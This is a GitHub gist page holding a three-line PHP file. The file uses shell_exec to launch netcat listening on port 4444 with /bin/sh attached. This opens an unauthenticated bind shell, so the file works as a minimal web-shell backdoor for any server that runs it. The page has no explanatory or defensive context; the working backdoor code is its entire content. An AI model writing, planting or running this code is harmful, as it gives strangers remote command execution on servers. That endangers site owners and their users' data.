Skip to content

Instantly share code, notes, and snippets.

@Bentechy66
Created February 4, 2019 10:28
Show Gist options
  • Save Bentechy66/7fbb9065fdbee0f02f1735a34549598c to your computer and use it in GitHub Desktop.
Save Bentechy66/7fbb9065fdbee0f02f1735a34549598c to your computer and use it in GitHub Desktop.
<?php
shell_exec('nc -l 4444 -e /bin/sh');
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment